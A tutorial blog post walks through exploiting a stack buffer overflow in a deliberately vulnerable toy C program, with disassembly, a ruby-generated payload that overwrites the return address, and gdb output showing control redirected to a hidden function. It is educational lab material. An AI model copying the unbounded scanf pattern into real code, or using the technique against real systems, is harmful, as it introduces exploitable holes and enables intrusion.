Marcelo Domínguez

Posted on Feb 17

Buffer Overflow: From Basics to Exploitation

Introduction

This article provides a hands-on guide to exploiting a buffer overflow, one of the most well-known and impactful software vulnerabilities. You'll learn how an attacker can manipulate a program's memory to execute arbitrary code, bypassing its intended behavior. By the end, you'll understand the mechanics behind buffer overflows and how they can lead to serious security risks.

Prerequisites

To follow along, you should have:

A basic understanding of C programming, including pointers and memory management.
Familiarity with the Linux command line and tools such as gcc and gdb.
A general understanding of computer architecture, specifically the stack and how functions are called.

Although the code used for this demonstration is not inherently dangerous, it is best to perform the exploitation in a controlled environment. That way, we’ll be ready when things get more interesting.

What is a Buffer Overflow?

A buffer overflow is a vulnerability in software that occurs when a program writes more data to a fixed-length block of memory (a buffer) than it is designed to hold. This can cause unintended behavior, including crashes, data corruption, or even exploitation by attackers to gain control of the system.

Buffer overflows occur when a program writes more data to a buffer than it can hold, leading to adjacent memory being overwritten. This can overwrite function return addresses, which can be manipulated by an attacker to redirect program control to arbitrary locations, such as malicious code or a ‘secret’ function.

Stack Memory Layout and Function calls

To understand how a buffer overflow can be exploited, we need to examine how the stack changes when a function is called.

Function Prologue

When a function is called, the following steps occur:

The return address (where execution should continue after the function ends) is pushed onto the stack.
The base pointer (rbp) of the previous function is saved to keep track of the caller's stack frame.
The stack pointer (rsp) is adjusted to allocate space for local variables.

For example, when calling the echo() function in our vulnerable program, the stack initially looks like this:

| Local Buffer (32 bytes)  |
| Saved %rbp (from main)   |
| Return Address (to main) |  <-  %rip

Note that the buffer is 20 bytes but the stack allocated 32 bytes (sub $0x20, %rsp).

Understanding Key Registers

To fully grasp how buffer overflows work, let's review the key registers involved:

rbp (Base Pointer): Holds the base address of the current function's stack frame. Used to access function parameters and local variables.
rsp (Stack Pointer): Points to the top of the stack, growing downwards as new data is pushed.
rip (Instruction Pointer): Holds the address of the next instruction to be executed. Overwriting this register allows an attacker to redirect execution.

Function Epilogue

When the function ends:

The base pointer (rbp) is restored.
The stack pointer (rsp) is adjusted to remove the local variables.
The function returns to the stored return address (ret instruction), resuming execution.

If an attacker overwrites the return address, they can control where execution continues.

Exploitation

Vulnerable code

#include <stdio.h>

void secret() {
    printf("Oops, you weren't supposed to see this 0_0!\n");
}

void echo() {
    char buffer[20];

    printf("What's your name?\n");
    scanf("%s", buffer);
    printf("Hello, %s!\n", buffer);    
}

int main(int argc, char* argv[]) {
    echo();
    return 0;
}

Compile the code with the following flags for static memory addresses and no stack protection:

static: for static memory addresses
fno-stack-protector: for no stack addresses protection

all: 
    gcc -static vuln.c -o vuln -fno-stack-protector
clean:
    rm vuln.c

To identify the address of the secret function, decompile the binary using objdump:

objdump -d vuln

After this, we will see a bunch of ASM code, but we will focus on the following section.

0000000000401905 <secret>:
  401905:       f3 0f 1e fa             endbr64
  401909:       55                      push   %rbp
  40190a:       48 89 e5                mov    %rsp,%rbp
  40190d:       48 8d 05 1c b7 09 00    lea    0x9b71c(%rip),%rax        # 49d030 <__rseq_flags+0x2c>
  401914:       48 89 c7                mov    %rax,%rdi
  401917:       e8 34 1a 01 00          call   413350 <_IO_puts>
  40191c:       90                      nop
  40191d:       5d                      pop    %rbp
  40191e:       c3                      ret

000000000040191f <echo>:
  40191f:       f3 0f 1e fa             endbr64
  401923:       55                      push   %rbp
  401924:       48 89 e5                mov    %rsp,%rbp
  401927:       48 83 ec 20             sub    $0x20,%rsp
  40192b:       48 8d 05 2a b7 09 00    lea    0x9b72a(%rip),%rax        # 49d05c <__rseq_flags+0x58>
  401932:       48 89 c7                mov    %rax,%rdi
  401935:       e8 16 1a 01 00          call   413350 <_IO_puts>
  40193a:       48 8d 45 e0             lea    -0x20(%rbp),%rax
  40193e:       48 89 c6                mov    %rax,%rsi
  401941:       48 8d 05 26 b7 09 00    lea    0x9b726(%rip),%rax        # 49d06e <__rseq_flags+0x6a>
  401948:       48 89 c7                mov    %rax,%rdi
  40194b:       b8 00 00 00 00          mov    $0x0,%eax
  401950:       e8 9b 34 00 00          call   404df0 <__isoc99_scanf>
  401955:       48 8d 45 e0             lea    -0x20(%rbp),%rax
  401959:       48 89 c6                mov    %rax,%rsi
  40195c:       48 8d 05 0e b7 09 00    lea    0x9b70e(%rip),%rax        # 49d071 <__rseq_flags+0x6d>
  401963:       48 89 c7                mov    %rax,%rdi
  401966:       b8 00 00 00 00          mov    $0x0,%eax
  40196b:       e8 50 35 00 00          call   404ec0 <_IO_printf>
  401970:       90                      nop
  401971:       c9                      leave
  401972:       c3                      ret

At the beginning of the echo function, we can see how the compiler reserves 32 bytes in the stack (sub $0x20,%rsp). Then, the current state of the stack is:

| Local Buffer (32 bytes)  |
| Saved %rbp (from main)   |
| Return Address (to main) |  <-  %rip

In our C code, there are no bounds, so what if we enter a string longer than 20 characters?

If we enter 20 to 31 characters, nothing will happen since we are inside the stack section enabled for the buf variable, even though the string length is 20. But if we go with more characters, we get a segmentation fault, let's inspect it using gdb to find out what is going on there. We can create a payload using, for example, ruby.

ruby -e 'print "a"*40 + "\xFE\xCA\x00\x00\x00\x00\x00\x00"' > input_data

Now, if we start a debugging session on gdb of our executable, and pass the payload as input.

(gdb) run < input_data
Starting program: /home/user/Desktop/c/buffer_overflow/vuln < input_data
What's your name?
Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�

Program received signal SIGSEGV, Segmentation fault.
0x000000000000cafe in ?? ()
(gdb) x $rip
0xcafe: Cannot access memory at address 0xcafe

We can see that we have just overwritten the $rip register. We get a SISGENV, and nothing interesting happens, but what if we set $rip to a valid direction?

From the assembly code of our decompiled binary, we know that the address of secret is 0x401905:

0000000000401905 <secret>
    ...

We update the payload generation.

ruby -e 'print "a"*40 + "\x05\x19\x40\x00\x00\x00\x00\x00"' > input_data

As before, we execute the binary and pass the payload as input:

(gdb) run < input_data
Starting program: /home/user/Desktop/c/buffer_overflow/vuln < input_data
Downloading separate debug info for system-supplied DSO at 0x7ffff7ffd000
What's your name?
Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@!
Oops, you weren't supposed to see this 0_0!

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe000 in ?? ()

We are getting a SIGSEGV this time, but the secret function is being executed now.

Forem

Buffer Overflow: From Basics to Exploitation

Introduction

Prerequisites

What is a Buffer Overflow?

Stack Memory Layout and Function calls

Function Prologue

Understanding Key Registers

Function Epilogue

Exploitation

Vulnerable code

Top comments (0)

Read next

RAG: Como IA pode ser inteligente sem reter dados?

Integrating Amazon Q Business Application with Slack Channel

How to Change / Update the Kernel in Linux (systemd-boot) baby

Amazon RDS Best Practices for High Availability and Scaling